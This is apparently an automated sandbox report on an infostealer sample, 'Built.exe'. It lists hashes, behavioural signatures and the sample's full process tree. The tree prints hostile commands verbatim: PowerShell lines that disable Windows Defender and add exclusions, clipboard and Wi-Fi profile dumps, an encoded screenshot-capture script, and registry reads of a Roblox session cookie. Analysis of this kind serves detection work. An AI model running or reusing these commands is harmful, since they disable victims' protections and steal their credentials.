Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

05/11/2024, 00:03 UTC

241105-aceyjs1bmq 10

04/11/2024, 23:42 UTC

241104-3pzgyaslhm 10

Analysis

  • max time kernel
    2s
  • max time network
    5s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    04/11/2024, 23:42 UTC

General

  • Target

    Built.exe

  • Size

    6.9MB

  • MD5

    c4b752ecacf4212ee6ff81daabf3cea5

  • SHA1

    08f93ca8e860ee45496e309178c3b298d13d5275

  • SHA256

    e8b156b122c0cab636e76dbd31c75a9c9385973f2d14ec148a3c23340a81fbf2

  • SHA512

    dfc920856801e99897b65a8513e0d385973259c1ca1988a3939e3f209a4642a2623dbe704f4ac48274114bd83d883d71bfa5c37b81095cefea428c43e44e480d

  • SSDEEP

    98304:oFDjWM8JEE1FQheamaHl3Ne4i3Tf2PkOpfW9hZMMoVmkzhxIdfXeRpYRJJcGhEI2:oF0AeNTfm/pf+xk4dWRpmrbW3jmrs

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 38 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3784
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2820
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2428
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2624
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1516
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:232
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3192
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2080
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2804
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          PID:5080
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2864
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          PID:1924
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        PID:3740
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          PID:4392
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
          PID:1900
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
              PID:3828
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
              PID:3880
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:4300
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
                PID:4840
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:1048
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                  3⤵
                  • System Network Configuration Discovery: Wi-Fi Discovery
                  PID:432
                  • C:\Windows\system32\netsh.exe
                    netsh wlan show profile
                    4⤵
                    • System Network Configuration Discovery: Wi-Fi Discovery
                    PID:1268
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "systeminfo"
                  3⤵
                    PID:2760
                    • C:\Windows\system32\systeminfo.exe
                      systeminfo
                      4⤵
                      • Gathers system information
                      PID:1372
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                    3⤵
                      PID:4292
                      • C:\Windows\system32\reg.exe
                        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                        4⤵
                          PID:764
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                        3⤵
                          PID:2120
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                            4⤵
                              PID:2068
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mf2yyhtx\mf2yyhtx.cmdline"
                                5⤵
                                  PID:3356
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA64.tmp" "c:\Users\Admin\AppData\Local\Temp\mf2yyhtx\CSC72ED34AFBB76494DB9E9B51322B1A65C.TMP"
                                    6⤵
                                      PID:4268
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                3⤵
                                  PID:4988
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    4⤵
                                      PID:2756
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:1196
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:3600
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:1916
                                          • C:\Windows\system32\attrib.exe
                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Views/modifies file attributes
                                            PID:1600
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:4932
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:3892
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                              3⤵
                                                PID:3504
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                  4⤵
                                                  • Views/modifies file attributes
                                                  PID:4756
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:4948
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:1480
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                    3⤵
                                                      PID:2160
                                                      • C:\Windows\system32\tasklist.exe
                                                        tasklist /FO LIST
                                                        4⤵
                                                        • Enumerates processes with tasklist
                                                        PID:5068
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:2112
                                                        • C:\Windows\System32\Conhost.exe
                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          4⤵
                                                            PID:1900
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            4⤵
                                                              PID:408
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:1600
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                PID:2936
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:1796
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                    PID:4640

                                                            Network

                                                            • flag-us
                                                              DNS
                                                              gstatic.com
                                                              Built.exe
                                                              Remote address:
                                                              8.8.8.8:53
                                                              Request
                                                              gstatic.com
                                                              IN A
                                                              Response
                                                              gstatic.com
                                                              IN A
                                                              216.58.201.99
                                                            • flag-us
                                                              DNS
                                                              99.201.58.216.in-addr.arpa
                                                              Built.exe
                                                              Remote address:
                                                              8.8.8.8:53
                                                              Request
                                                              99.201.58.216.in-addr.arpa
                                                              IN PTR
                                                              Response
                                                              99.201.58.216.in-addr.arpa
                                                              IN PTR
                                                              lhr48s48-in-f31e100net
                                                              99.201.58.216.in-addr.arpa
                                                              IN PTR
                                                              prg03s02-in-f99�G
                                                              99.201.58.216.in-addr.arpa
                                                              IN PTR
                                                              prg03s02-in-f3�G
                                                            • 216.58.201.99:443
                                                              gstatic.com
                                                              tls
                                                              Built.exe
                                                              1.1kB
                                                              5.3kB
                                                              9
                                                              9
                                                            • 8.8.8.8:53
                                                              gstatic.com
                                                              dns
                                                              Built.exe
                                                              129 B
                                                              242 B
                                                              2
                                                              2

                                                              DNS Request

                                                              gstatic.com

                                                              DNS Response

                                                              216.58.201.99

                                                              DNS Request

                                                              99.201.58.216.in-addr.arpa

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                              Filesize

                                                              3KB

                                                              MD5

                                                              74e4a39ae145a98de20041613220dfed

                                                              SHA1

                                                              ac5dd2331ae591d7d361e8947e1a8fba2c6bea12

                                                              SHA256

                                                              2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36

                                                              SHA512

                                                              96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              944B

                                                              MD5

                                                              408641808e457ab6e23d62e59b767753

                                                              SHA1

                                                              4205cfa0dfdfee6be08e8c0041d951dcec1d3946

                                                              SHA256

                                                              3921178878eb416764a6993c4ed81a1f371040dda95c295af535563f168b4258

                                                              SHA512

                                                              e7f3ffc96c7caad3d73c5cec1e60dc6c7d5ed2ced7d265fbd3a402b6f76fed310a087d2d5f0929ab90413615dad1d54fce52875750057cffe36ff010fc6323fb

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              a2efa96ce171116f330c374dcc40b2f5

                                                              SHA1

                                                              cde0bd502b7ee622bb1519256229cd34c3e003ae

                                                              SHA256

                                                              31658d1f0dc0500312e843f8d5ef0b1e0769278e3aeb0873d61665a328136b4e

                                                              SHA512

                                                              5cc560e2c385b500eefd82bb288f88597b29cc539f79ce5dbd02ff595fcd3b8fa5763e3ccc718b0c8ab768c7ef998508d2391c3b4dcd9ee979f206111e8bf0b3

                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              7332074ae2b01262736b6fbd9e100dac

                                                              SHA1

                                                              22f992165065107cc9417fa4117240d84414a13c

                                                              SHA256

                                                              baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

                                                              SHA512

                                                              4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

                                                            • C:\Users\Admin\AppData\Local\Temp\RESCA64.tmp

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              0f2dccbd3f64b9dd304491de3e509d01

                                                              SHA1

                                                              d579b1b809006877ffa9eef1923f7b66e3a40822

                                                              SHA256

                                                              5387ddd3cd56349f0165cabaf5e8ed29e8c59ae2bd8dec4e0d5c141ac15c9c7d

                                                              SHA512

                                                              a9d725076af4e14747931ffb505a6cdb86c6295ae8ab2259eded6faa56edfbd450beacbb1acfc7aa360c96449716398116ab9fa0c66d7292873b2d04736fe690

                                                            • C:\Users\Admin\AppData\Local\Temp\_MEI37842\VCRUNTIME140.dll

                                                              Filesize

                                                              96KB

                                                              MD5

                                                              f12681a472b9dd04a812e16096514974

                                                              SHA1

                                                              6fd102eb3e0b0e6eef08118d71f28702d1a9067c

                                                              SHA256

                                                              d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

                                                              SHA512

